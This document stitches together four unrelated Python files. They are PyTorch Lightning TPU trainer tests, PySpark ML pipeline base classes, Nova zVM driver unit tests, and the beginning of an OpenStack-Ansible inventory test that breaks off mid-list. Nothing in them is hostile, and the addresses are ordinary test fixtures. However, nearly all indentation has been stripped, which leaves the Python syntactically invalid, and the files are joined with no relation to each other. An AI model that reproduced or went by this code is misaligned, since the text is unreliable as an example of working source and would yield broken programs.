# Train a model on TPU
model = BoringModel()
trainer = Trainer(checkpoint_callback=True, max_epochs=1, tpu_cores=8)
trainer.fit(model)
model_path = trainer.checkpoint_callback.best_model_path
# Verify saved Tensors are on CPU
ckpt = torch.load(model_path)
weight_tensor = list(ckpt["state_dict"].values())[0]
assert weight_tensor.device == torch.device("cpu")
# Verify that training is resumed on CPU
trainer = Trainer(
resume_from_checkpoint=model_path, checkpoint_callback=True, max_epochs=1, default_root_dir=tmpdir
)
trainer.fit(model)
assert trainer.state.finished, f"Training failed with {trainer.state}"
@RunIf(tpu=True)
@pl_multi_process_test
def test_if_test_works_after_train(tmpdir):
"""Ensure that .test() works after .fit()"""
# Train a model on TPU
model = BoringModel()
trainer = Trainer(max_epochs=1, tpu_cores=8, default_root_dir=tmpdir, fast_dev_run=True)
trainer.fit(model)
assert len(trainer.test(model)) == 1
@RunIf(tpu=True)
@pl_multi_process_test
def test_weight_tying_warning(tmpdir, capsys=None):
"""
Ensure a warning is thrown if model parameter lengths do not match
post moving to device.
"""
model = WeightSharingModule()
trainer = Trainer(checkpoint_callback=True, max_epochs=1, tpu_cores=1)
with pytest.warns(UserWarning, match=r"The model layers do not match after moving to the target device."):
trainer.fit(model)
@RunIf(tpu=True)
@pl_multi_process_test
def test_if_weights_tied(tmpdir, capsys=None):
"""
Test if weights are properly tied on `on_post_move_to_device`.
Ensure no warning for parameter mismatch is thrown.
"""
class Model(WeightSharingModule):
def on_post_move_to_device(self):
self.layer_3.weight = self.layer_1.weight
model = Model()
trainer = Trainer(checkpoint_callback=True, max_epochs=1, tpu_cores=1)
with pytest.warns(UserWarning, match="The model layers do not match"):
trainer.fit(model)
@RunIf(tpu=True)
def test_accelerator_tpu():
trainer = Trainer(accelerator="tpu", tpu_cores=8)
assert trainer._device_type == "tpu"
assert isinstance(trainer.accelerator, TPUAccelerator)
with pytest.raises(
MisconfigurationException, match="You passed `accelerator='tpu'`, but you didn't pass `tpu_cores` to `Trainer`"
):
trainer = Trainer(accelerator="tpu")
@RunIf(tpu=True)
def test_accelerator_cpu_with_tpu_cores_flag():
trainer = Trainer(accelerator="cpu", tpu_cores=8)
assert trainer._device_type == "cpu"
assert isinstance(trainer.accelerator, CPUAccelerator)
@RunIf(tpu=True)
def test_accelerator_tpu_with_auto():
trainer = Trainer(accelerator="auto", tpu_cores=8)
assert trainer._device_type == "tpu"
assert isinstance(trainer.accelerator, TPUAccelerator)
@RunIf(tpu=True)
def test_accelerator_tpu_with_devices():
trainer = Trainer(accelerator="tpu", devices=8)
assert trainer.tpu_cores == 8
assert isinstance(trainer.training_type_plugin, TPUSpawnPlugin)
assert isinstance(trainer.accelerator, TPUAccelerator)
@RunIf(tpu=True)
def test_accelerator_auto_with_devices_tpu():
trainer = Trainer(accelerator="auto", devices=8)
assert trainer._device_type == "tpu"
assert trainer.tpu_cores == 8
@RunIf(tpu=True)
def test_accelerator_tpu_with_tpu_cores_priority():
"""Test for checking `tpu_cores` flag takes priority over `devices`."""
tpu_cores = 8
with pytest.warns(UserWarning, match="The flag `devices=1` will be ignored,"):
trainer = Trainer(accelerator="tpu", devices=1, tpu_cores=tpu_cores)
assert trainer.tpu_cores == tpu_cores
@RunIf(tpu=True)
def test_set_devices_if_none_tpu():
trainer = Trainer(accelerator="tpu", tpu_cores=8)
assert trainer.devices == 8
@RunIf(tpu=True)
def test_manual_optimization_tpus(tmpdir):
class ManualOptimizationModel(BoringModel):
count = 0
called = collections.defaultdict(int)
def __init__(self):
super().__init__()
self.automatic_optimization = False
@property
def should_update(self):
return self.count % 2 == 0
def on_train_batch_start(self, batch, batch_idx, dataloader_idx):
self.called["on_train_batch_start"] += 1
self.weight_before = self.layer.weight.clone()
def training_step(self, batch, batch_idx):
self.called["training_step"] += 1
opt = self.optimizers()
output = self.layer(batch)
loss = self.loss(batch, output)
if self.should_update:
self.manual_backward(loss)
opt.step()
opt.zero_grad()
return loss
def on_train_batch_end(self, outputs, batch, batch_idx, dataloader_idx):
self.called["on_train_batch_end"] += 1
after_before = self.layer.weight.clone()
if self.should_update:
assert not torch.equal(self.weight_before, after_before), self.count
else:
assert torch.equal(self.weight_before, after_before)
assert torch.all(self.layer.weight.grad == 0)
self.count += 1
def on_train_end(self):
assert self.called["training_step"] == 5
assert self.called["on_train_batch_start"] == 5
assert self.called["on_train_batch_end"] == 5
    class TestManualOptimizationCallback(Callback):
def on_train_end(self, trainer, pl_module):
opt = pl_module.optimizers()
assert opt._total_optimizer_step_calls == 3
model = ManualOptimizationModel()
model_copy = deepcopy(model)
model.training_step_end = None
model.training_epoch_end = None
trainer = Trainer(
max_epochs=1,
default_root_dir=tmpdir,
limit_train_batches=5,
limit_test_batches=0,
limit_val_batches=0,
tpu_cores=8,
        callbacks=[TestManualOptimizationCallback()],
)
trainer.fit(model)
for param, param_copy in zip(model.parameters(), model_copy.parameters()):
assert not torch.equal(param.cpu().data, param_copy.data)
@RunIf(tpu=True)
def test_ddp_cpu_not_supported_on_tpus():
with pytest.raises(MisconfigurationException, match="`accelerator='ddp_cpu'` is not supported on TPU machines"):
Trainer(accelerator="ddp_cpu")
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod
from pyspark.ml.param import Param, Params
from pyspark.ml.util import keyword_only
from pyspark.mllib.common import inherit_doc
@inherit_doc
class Estimator(Params):
"""
Abstract class for estimators that fit models to data.
"""
__metaclass__ = ABCMeta
@abstractmethod
def _fit(self, dataset):
"""
Fits a model to the input dataset. This is called by the
default implementation of fit.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:returns: fitted model
"""
raise NotImplementedError()
def fit(self, dataset, params=None):
"""
Fits a model to the input dataset with optional parameters.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:param params: an optional param map that overrides embedded
params. If a list/tuple of param maps is given,
this calls fit on each param map and returns a
list of models.
:returns: fitted model(s)
"""
if params is None:
params = dict()
if isinstance(params, (list, tuple)):
return [self.fit(dataset, paramMap) for paramMap in params]
elif isinstance(params, dict):
if params:
return self.copy(params)._fit(dataset)
else:
return self._fit(dataset)
else:
raise ValueError("Params must be either a param map or a list/tuple of param maps, "
"but got %s." % type(params))
@inherit_doc
class Transformer(Params):
"""
Abstract class for transformers that transform one dataset into
another.
"""
__metaclass__ = ABCMeta
@abstractmethod
def _transform(self, dataset):
"""
Transforms the input dataset with optional parameters.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:returns: transformed dataset
"""
raise NotImplementedError()
def transform(self, dataset, params=None):
"""
Transforms the input dataset with optional parameters.
:param dataset: input dataset, which is an instance of
:py:class:`pyspark.sql.DataFrame`
:param params: an optional param map that overrides embedded
params.
:returns: transformed dataset
"""
if params is None:
params = dict()
if isinstance(params, dict):
if params:
                return self.copy(params)._transform(dataset)
else:
return self._transform(dataset)
else:
raise ValueError("Params must be either a param map but got %s." % type(params))
@inherit_doc
class Model(Transformer):
"""
Abstract class for models that are fitted by estimators.
"""
__metaclass__ = ABCMeta
@inherit_doc
class Pipeline(Estimator):
"""
A simple pipeline, which acts as an estimator. A Pipeline consists
of a sequence of stages, each of which is either an
:py:class:`Estimator` or a :py:class:`Transformer`. When
:py:meth:`Pipeline.fit` is called, the stages are executed in
order. If a stage is an :py:class:`Estimator`, its
:py:meth:`Estimator.fit` method will be called on the input
dataset to fit a model. Then the model, which is a transformer,
will be used to transform the dataset as the input to the next
stage. If a stage is a :py:class:`Transformer`, its
:py:meth:`Transformer.transform` method will be called to produce
the dataset for the next stage. The fitted model from a
    :py:class:`Pipeline` is a :py:class:`PipelineModel`, which
consists of fitted models and transformers, corresponding to the
pipeline stages. If there are no stages, the pipeline acts as an
identity transformer.
"""
@keyword_only
def __init__(self, stages=None):
"""
__init__(self, stages=None)
"""
if stages is None:
stages = []
super(Pipeline, self).__init__()
#: Param for pipeline stages.
self.stages = Param(self, "stages", "pipeline stages")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
def setStages(self, value):
"""
Set pipeline stages.
:param value: a list of transformers or estimators
:return: the pipeline instance
"""
self._paramMap[self.stages] = value
return self
def getStages(self):
"""
Get pipeline stages.
"""
if self.stages in self._paramMap:
return self._paramMap[self.stages]
@keyword_only
def setParams(self, stages=None):
"""
setParams(self, stages=None)
Sets params for Pipeline.
"""
if stages is None:
stages = []
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _fit(self, dataset):
stages = self.getStages()
for stage in stages:
if not (isinstance(stage, Estimator) or isinstance(stage, Transformer)):
raise TypeError(
"Cannot recognize a pipeline stage of type %s." % type(stage))
indexOfLastEstimator = -1
for i, stage in enumerate(stages):
if isinstance(stage, Estimator):
indexOfLastEstimator = i
transformers = []
for i, stage in enumerate(stages):
if i <= indexOfLastEstimator:
if isinstance(stage, Transformer):
transformers.append(stage)
dataset = stage.transform(dataset)
else: # must be an Estimator
model = stage.fit(dataset)
transformers.append(model)
if i < indexOfLastEstimator:
dataset = model.transform(dataset)
else:
transformers.append(stage)
return PipelineModel(transformers)
def copy(self, extra=None):
if extra is None:
extra = dict()
that = Params.copy(self, extra)
stages = [stage.copy(extra) for stage in that.getStages()]
return that.setStages(stages)
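# Usage sketch (illustrative; assumes stages such as Tokenizer, HashingTF and
# LogisticRegression from pyspark.ml plus training/test DataFrames exist):
#
#     pipeline = Pipeline(stages=[tokenizer, hashing_tf, lr])
#     model = pipeline.fit(training)       # returns a PipelineModel
#     predictions = model.transform(test)  # applies each fitted stage in order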
@inherit_doc
class PipelineModel(Model):
"""
Represents a compiled pipeline with transformers and fitted models.
"""
def __init__(self, stages):
super(PipelineModel, self).__init__()
self.stages = stages
def _transform(self, dataset):
for t in self.stages:
dataset = t.transform(dataset)
return dataset
def copy(self, extra=None):
if extra is None:
extra = dict()
stages = [stage.copy(extra) for stage in self.stages]
return PipelineModel(stages)
|
|
# Copyright 2017,2018 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
import os
from oslo_utils.fixture import uuidsentinel
import six
from nova import conf
from nova import context
from nova import exception
from nova.network import model as network_model
from nova import objects
from nova import test
from nova.tests.unit import fake_instance
from nova.virt import fake
from nova.virt.zvm import driver as zvmdriver
CONF = conf.CONF
class TestZVMDriver(test.NoDBTestCase):
def setUp(self):
super(TestZVMDriver, self).setUp()
self.flags(my_ip='192.168.1.1',
instance_name_template='abc%05d')
self.flags(cloud_connector_url='https://1.1.1.1:1111', group='zvm')
with mock.patch('nova.virt.zvm.utils.ConnectorClient.call') as mcall, \
mock.patch('pwd.getpwuid', return_value=mock.Mock(pw_name='test')):
mcall.return_value = {'hypervisor_hostname': 'TESTHOST',
'ipl_time': 'IPL at 11/14/17 10:47:44 EST'}
self._driver = zvmdriver.ZVMDriver(fake.FakeVirtAPI())
self._hypervisor = self._driver._hypervisor
self._context = context.RequestContext('fake_user', 'fake_project')
        self._image_id = uuidsentinel.image_id
self._instance_values = {
'display_name': 'test',
'uuid': uuidsentinel.inst_id,
'vcpus': 1,
'memory_mb': 1024,
'image_ref': self._image_id,
'root_gb': 0,
}
self._instance = fake_instance.fake_instance_obj(
self._context, **self._instance_values)
self._instance.flavor = objects.Flavor(name='testflavor',
vcpus=1, root_gb=3, ephemeral_gb=10,
swap=0, memory_mb=512, extra_specs={})
self._eph_disks = [{'guest_format': u'ext3',
'device_name': u'/dev/sdb',
'disk_bus': None,
'device_type': None,
'size': 1},
{'guest_format': u'ext4',
'device_name': u'/dev/sdc',
'disk_bus': None,
'device_type': None,
'size': 2}]
self._block_device_info = {'swap': None,
'root_device_name': u'/dev/sda',
'ephemerals': self._eph_disks,
'block_device_mapping': []}
fake_image_meta = {'status': 'active',
'properties': {'os_distro': 'rhel7.2'},
'name': 'rhel72eckdimage',
'deleted': False,
'container_format': 'bare',
'disk_format': 'raw',
'id': self._image_id,
'owner': 'cfc26f9d6af948018621ab00a1675310',
'checksum': 'b026cd083ef8e9610a29eaf71459cc',
'min_disk': 0,
'is_public': False,
'deleted_at': None,
'min_ram': 0,
'size': 465448142}
self._image_meta = objects.ImageMeta.from_dict(fake_image_meta)
subnet_4 = network_model.Subnet(cidr='192.168.0.1/24',
dns=[network_model.IP('192.168.0.1')],
gateway=
network_model.IP('192.168.0.1'),
ips=[
network_model.IP('192.168.0.100')],
routes=None)
network = network_model.Network(id=0,
bridge='fa0',
label='fake',
subnets=[subnet_4],
vlan=None,
bridge_interface=None,
injected=True)
self._network_values = {
'id': None,
'address': 'DE:AD:BE:EF:00:00',
'network': network,
'type': network_model.VIF_TYPE_OVS,
'devname': None,
'ovs_interfaceid': None,
'rxtx_cap': 3
}
self._network_info = network_model.NetworkInfo([
network_model.VIF(**self._network_values)
])
self.mock_update_task_state = mock.Mock()
def test_driver_init_no_url(self):
self.flags(cloud_connector_url=None, group='zvm')
self.assertRaises(exception.ZVMDriverException,
zvmdriver.ZVMDriver, 'virtapi')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_get_available_resource_err_case(self, call):
res = {'overallRC': 1, 'errmsg': 'err', 'rc': 0, 'rs': 0}
call.side_effect = exception.ZVMConnectorError(res)
results = self._driver.get_available_resource()
self.assertEqual(0, results['vcpus'])
self.assertEqual(0, results['memory_mb_used'])
self.assertEqual(0, results['disk_available_least'])
self.assertEqual('TESTHOST', results['hypervisor_hostname'])
def test_driver_template_validation(self):
self.flags(instance_name_template='abc%6d')
self.assertRaises(exception.ZVMDriverException,
self._driver._validate_options)
@mock.patch('nova.virt.zvm.guest.Guest.get_info')
def test_get_info(self, mock_get):
self._driver.get_info(self._instance)
mock_get.assert_called_once_with()
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_get_image_info_err(self, call):
res = {'overallRC': 500, 'errmsg': 'err', 'rc': 0, 'rs': 0}
call.side_effect = exception.ZVMConnectorError(res)
self.assertRaises(exception.ZVMConnectorError,
self._driver._get_image_info,
'context', 'image_meta_id', 'os_distro')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._import_spawn_image')
def test_private_get_image_info(self, image_import, call):
res = {'overallRC': 404, 'errmsg': 'err', 'rc': 0, 'rs': 0}
call_response = []
call_response.append(exception.ZVMConnectorError(results=res))
call_response.append([{'imagename': 'image-info'}])
call.side_effect = call_response
self._driver._get_image_info('context', 'image_meta_id', 'os_distro')
image_import.assert_called_once_with('context', 'image_meta_id',
'os_distro')
call.assert_has_calls(
[mock.call('image_query', imagename='image_meta_id')] * 2
)
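        # Flow exercised here (per the side_effect list above): the first
        # image_query raises a not-found ZVMConnectorError, the driver then
        # imports the spawn image and queries again, hence two identical calls.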
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_get_image_info_exist(self, call):
call.return_value = [{'imagename': 'image-info'}]
res = self._driver._get_image_info('context', 'image_meta_id',
'os_distro')
call.assert_called_once_with('image_query', imagename='image_meta_id')
self.assertEqual('image-info', res)
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def _test_set_disk_list(self, call, has_get_root_units=False,
has_eph_disks=False):
disk_list = [{'is_boot_disk': True, 'size': '3g'}]
eph_disk_list = [{'format': u'ext3', 'size': '1g'},
{'format': u'ext3', 'size': '2g'}]
_inst = copy.deepcopy(self._instance)
_bdi = copy.deepcopy(self._block_device_info)
if has_get_root_units:
# overwrite
disk_list = [{'is_boot_disk': True, 'size': '3338'}]
call.return_value = '3338'
_inst['root_gb'] = 0
else:
_inst['root_gb'] = 3
if has_eph_disks:
disk_list += eph_disk_list
else:
_bdi['ephemerals'] = []
eph_disk_list = []
res1, res2 = self._driver._set_disk_list(_inst, self._image_meta.id,
_bdi)
if has_get_root_units:
call.assert_called_once_with('image_get_root_disk_size',
self._image_meta.id)
self.assertEqual(disk_list, res1)
self.assertEqual(eph_disk_list, res2)
def test_private_set_disk_list_simple(self):
self._test_set_disk_list()
def test_private_set_disk_list_with_eph_disks(self):
self._test_set_disk_list(has_eph_disks=True)
def test_private_set_disk_list_with_get_root_units(self):
self._test_set_disk_list(has_get_root_units=True)
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_setup_network(self, call):
inst_nets = []
_net = {'ip_addr': '192.168.0.100',
'gateway_addr': '192.168.0.1',
'cidr': '192.168.0.1/24',
'mac_addr': 'DE:AD:BE:EF:00:00',
'nic_id': None}
inst_nets.append(_net)
self._driver._setup_network('vm_name', 'os_distro',
self._network_info,
self._instance)
call.assert_called_once_with('guest_create_network_interface',
'vm_name', 'os_distro', inst_nets)
@mock.patch('nova.virt.images.fetch')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_private_import_spawn_image(self, call, fetch):
image_name = CONF.zvm.image_tmp_path + '/image_name'
image_url = "file://" + image_name
image_meta = {'os_version': 'os_version'}
with mock.patch('os.path.exists', side_effect=[False]):
self._driver._import_spawn_image(self._context, 'image_name',
'os_version')
fetch.assert_called_once_with(self._context, 'image_name',
image_name)
call.assert_called_once_with('image_import', 'image_name', image_url,
image_meta, remote_host='test@192.168.1.1')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_destroy(self, call, guest_exists):
guest_exists.return_value = True
self._driver.destroy(self._context, self._instance,
network_info=self._network_info)
call.assert_called_once_with('guest_delete', self._instance['name'])
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.compute.manager.ComputeVirtAPI.wait_for_instance_event')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._setup_network')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._set_disk_list')
@mock.patch('nova.virt.zvm.utils.generate_configdrive')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._get_image_info')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_spawn(self, call, get_image_info, gen_conf_file, set_disk_list,
setup_network, mock_wait, mock_exists):
_bdi = copy.copy(self._block_device_info)
get_image_info.return_value = 'image_name'
gen_conf_file.return_value = 'transportfiles'
set_disk_list.return_value = 'disk_list', 'eph_list'
mock_exists.return_value = False
self._driver.spawn(self._context, self._instance, self._image_meta,
injected_files=None, admin_password=None,
allocations=None, network_info=self._network_info,
block_device_info=_bdi)
gen_conf_file.assert_called_once_with(self._context, self._instance,
None, self._network_info, None)
get_image_info.assert_called_once_with(self._context,
self._image_meta.id,
self._image_meta.properties.os_distro)
set_disk_list.assert_called_once_with(self._instance, 'image_name',
_bdi)
setup_network.assert_called_once_with(self._instance.name,
self._image_meta.properties.os_distro,
self._network_info, self._instance)
call.assert_has_calls([
mock.call('guest_create', self._instance.name,
1, 1024, disk_list='disk_list'),
mock.call('guest_deploy', self._instance.name, 'image_name',
transportfiles='transportfiles',
remotehost='test@192.168.1.1'),
mock.call('guest_config_minidisks', self._instance.name,
'eph_list'),
mock.call('guest_start', self._instance.name)
])
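        # The asserted order mirrors the driver's spawn sequence: create the
        # guest, deploy the image, configure ephemeral minidisks, then start.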
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._get_image_info')
def test_spawn_image_no_distro_empty(self, get_image_info, mock_exists):
meta = {'status': 'active',
'deleted': False,
'properties': {'os_distro': ''},
'id': self._image_id,
'size': 465448142}
self._image_meta = objects.ImageMeta.from_dict(meta)
mock_exists.return_value = False
self.assertRaises(exception.InvalidInput, self._driver.spawn,
self._context, self._instance, self._image_meta,
injected_files=None, admin_password=None,
allocations=None, network_info=self._network_info,
block_device_info=None)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_exists')
@mock.patch('nova.virt.zvm.driver.ZVMDriver._get_image_info')
def test_spawn_image_no_distro_none(self, get_image_info, mock_exists):
meta = {'status': 'active',
'deleted': False,
'id': self._image_id,
'size': 465448142}
self._image_meta = objects.ImageMeta.from_dict(meta)
mock_exists.return_value = False
self.assertRaises(exception.InvalidInput, self._driver.spawn,
self._context, self._instance, self._image_meta,
injected_files=None, admin_password=None,
allocations=None, network_info=self._network_info,
block_device_info=None)
@mock.patch.object(six.moves.builtins, 'open')
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_snapshot(self, call, get_image_service, mock_open):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
call_resp = ['', {"os_version": "rhel7.2",
"dest_url": "file:///path/to/target"}, '']
call.side_effect = call_resp
new_image_meta = {
'is_public': False,
'status': 'active',
'properties': {
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': self._instance['project_id'],
'os_distro': call_resp[1]['os_version'],
'architecture': 's390x',
'hypervisor_type': 'zvm'
},
'disk_format': 'raw',
'container_format': 'bare',
}
image_path = os.path.join(os.path.normpath(
CONF.zvm.image_tmp_path), image_id)
dest_path = "file://" + image_path
self._driver.snapshot(self._context, self._instance, image_id,
self.mock_update_task_state)
get_image_service.assert_called_with(self._context, image_id)
mock_open.assert_called_once_with(image_path, 'r')
ret_file = mock_open.return_value.__enter__.return_value
image_service.update.assert_called_once_with(self._context,
image_id,
new_image_meta,
ret_file,
purge_props=False)
self.mock_update_task_state.assert_has_calls([
mock.call(task_state='image_pending_upload'),
mock.call(expected_state='image_pending_upload',
task_state='image_uploading')
])
call.assert_has_calls([
mock.call('guest_capture', self._instance.name, image_id),
mock.call('image_export', image_id, dest_path,
remote_host=mock.ANY),
mock.call('image_delete', image_id)
])
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_capture')
def test_snapshot_capture_fail(self, mock_capture, get_image_service):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
mock_capture.side_effect = exception.ZVMDriverException(error='error')
self.assertRaises(exception.ZVMDriverException, self._driver.snapshot,
self._context, self._instance, image_id,
self.mock_update_task_state)
self.mock_update_task_state.assert_called_once_with(
task_state='image_pending_upload')
image_service.delete.assert_called_once_with(self._context, image_id)
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_delete')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_export')
def test_snapshot_import_fail(self, mock_import, mock_delete,
call, get_image_service):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
mock_import.side_effect = exception.ZVMDriverException(error='error')
self.assertRaises(exception.ZVMDriverException, self._driver.snapshot,
self._context, self._instance, image_id,
self.mock_update_task_state)
self.mock_update_task_state.assert_called_once_with(
task_state='image_pending_upload')
get_image_service.assert_called_with(self._context, image_id)
call.assert_called_once_with('guest_capture',
self._instance.name, image_id)
mock_delete.assert_called_once_with(image_id)
image_service.delete.assert_called_once_with(self._context, image_id)
@mock.patch.object(six.moves.builtins, 'open')
@mock.patch('nova.image.glance.get_remote_image_service')
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_delete')
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.image_export')
def test_snapshot_update_fail(self, mock_import, mock_delete, call,
get_image_service, mock_open):
image_service = mock.Mock()
image_id = 'e9ee1562-3ea1-4cb1-9f4c-f2033000eab1'
get_image_service.return_value = (image_service, image_id)
image_service.update.side_effect = exception.ImageNotAuthorized(
image_id='dummy')
image_path = os.path.join(os.path.normpath(
CONF.zvm.image_tmp_path), image_id)
self.assertRaises(exception.ImageNotAuthorized, self._driver.snapshot,
self._context, self._instance, image_id,
self.mock_update_task_state)
mock_open.assert_called_once_with(image_path, 'r')
get_image_service.assert_called_with(self._context, image_id)
mock_delete.assert_called_once_with(image_id)
image_service.delete.assert_called_once_with(self._context, image_id)
self.mock_update_task_state.assert_has_calls([
mock.call(task_state='image_pending_upload'),
mock.call(expected_state='image_pending_upload',
task_state='image_uploading')
])
call.assert_called_once_with('guest_capture', self._instance.name,
image_id)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_start')
def test_guest_start(self, call):
self._driver.power_on(self._context, self._instance, None)
call.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_softstop')
def test_power_off(self, ipa):
self._driver.power_off(self._instance)
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_softstop')
def test_power_off_with_timeout_interval(self, ipa):
self._driver.power_off(self._instance, 60, 10)
ipa.assert_called_once_with(self._instance.name,
timeout=60, retry_interval=10)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_pause')
def test_pause(self, ipa):
self._driver.pause(self._instance)
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_unpause')
def test_unpause(self, ipa):
self._driver.unpause(self._instance)
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_reboot')
def test_reboot_soft(self, ipa):
self._driver.reboot(None, self._instance, None, 'SOFT')
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.guest_reset')
def test_reboot_hard(self, ipa):
self._driver.reboot(None, self._instance, None, 'HARD')
ipa.assert_called_once_with(self._instance.name)
@mock.patch('nova.virt.zvm.hypervisor.Hypervisor.list_names')
def test_instance_exists(self, mock_list):
mock_list.return_value = [self._instance.name.upper()]
        # Create a new server which is not in list_instances' output
another_instance = fake_instance.fake_instance_obj(self._context,
id=10)
self.assertTrue(self._driver.instance_exists(self._instance))
self.assertFalse(self._driver.instance_exists(another_instance))
@mock.patch('nova.virt.zvm.utils.ConnectorClient.call')
def test_get_console_output(self, call):
call.return_value = 'console output'
outputs = self._driver.get_console_output(None, self._instance)
call.assert_called_once_with('guest_get_console_output', 'abc00001')
self.assertEqual('console output', outputs)
|
|
#!/usr/bin/env python
import collections
import json
import os
from os import path
import subprocess
import sys
import unittest
import yaml
INV_DIR = 'playbooks/inventory'
SCRIPT_FILENAME = 'dynamic_inventory.py'
INV_SCRIPT = path.join(os.getcwd(), INV_DIR, SCRIPT_FILENAME)
sys.path.append(path.join(os.getcwd(), INV_DIR))
import dynamic_inventory as di
TARGET_DIR = path.join(os.getcwd(), 'tests', 'inventory')
USER_CONFIG_FILE = path.join(TARGET_DIR, "openstack_user_config.yml")
# These files will be placed in TARGET_DIR by INV_SCRIPT.
# They should be cleaned up between each test.
CLEANUP = [
'openstack_inventory.json',
'openstack_hostnames_ips.yml',
'backup_openstack_inventory.tar'
]
def cleanup():
for f_name in CLEANUP:
f_file = path.join(TARGET_DIR, f_name)
if os.path.exists(f_file):
os.remove(f_file)
def get_inventory():
"Return the inventory mapping in a dict."
try:
cmd = [INV_SCRIPT, '--config', TARGET_DIR]
inventory_string = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT
)
inventory = json.loads(inventory_string)
return inventory
finally:
# Remove the file system artifacts since we want to force fresh runs
cleanup()
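# Illustrative shape of the inventory returned above (standard Ansible
# dynamic-inventory JSON; group and host names are placeholders):
#
#     {
#         "_meta": {"hostvars": {"aio1": {...}}},
#         "all": {"vars": {...}},
#         "<group>": {"hosts": [...], ...}
#     }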
class TestAnsibleInventoryFormatConstraints(unittest.TestCase):
inventory = None
expected_groups = [
'aio1_containers',
'all',
'all_containers',
'aodh_alarm_evaluator',
'aodh_alarm_notifier',
'aodh_all',
'aodh_api',
'aodh_container',
'aodh_listener',
'ceilometer_agent_central',
'ceilometer_agent_compute',
'ceilometer_agent_notification',
'ceilometer_all',
'ceilometer_api',
'ceilometer_api_container',
'ceilometer_collector',
'ceilometer_collector_container',
'cinder_all',
'cinder_api',
'cinder_api_container',
'cinder_backup',
'cinder_scheduler',
'cinder_scheduler_container',
'cinder_volume',
'cinder_volumes_container',
'compute_all',
'compute_containers',
'compute_hosts',
'galera',
'galera_all',
'galera_container',
'glance_all',
'glance_api',
'glance_container',
'glance_registry',
'haproxy',
'haproxy_all',
'haproxy_container',
'haproxy_containers',
'haproxy_hosts',
'heat_all',
'heat_api',
'heat_api_cfn',
'heat_api_cloudwatch',
'heat_apis_container',
'heat_engine',
'heat_engine_container',
'horizon',
'horizon_all',
'horizon_container',
'hosts',
'identity_all',
'identity_containers',
'identity_hosts',
'infra_containers',
'infra_hosts',
'ironic-server_hosts',
'ironic_conductor_container',
'ironic_api_container',
'ironic_conductor',
'ironic-infra_containers',
'ironic-infra_hosts',
'ironic_servers',
'ironic-server_containers',
'ironic_all',
'ironic_server',
'ironic_server_container',
'ironic_api',
'keystone',
'keystone_all',
'keystone_container',
'log_all',
